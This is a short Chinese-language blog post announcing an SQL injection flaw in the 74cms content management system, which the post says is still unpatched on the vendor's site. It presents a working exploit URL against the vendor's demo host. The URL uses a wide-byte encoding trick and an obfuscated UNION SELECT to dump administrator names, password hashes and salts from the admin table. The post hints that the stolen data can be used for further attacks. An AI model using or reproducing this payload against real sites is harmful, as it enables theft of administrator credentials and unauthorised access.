一个iconv引发的猪肉

经过测试官网居然没补。。。

74cms最新通杀注入漏洞 – 网站安全 – 自学php插图

md5解不开,但是可以用来爆各种信息 你懂的

exp:http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

    上一篇: PHP安全代码审计手册[总结版] - 网站安全 - 自学

    下一篇: 曲线救国打完美迂回战术——不算提权的提权
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《74cms最新通杀注入漏洞 – 网站安全 – 自学php
   

还没有人抢沙发呢~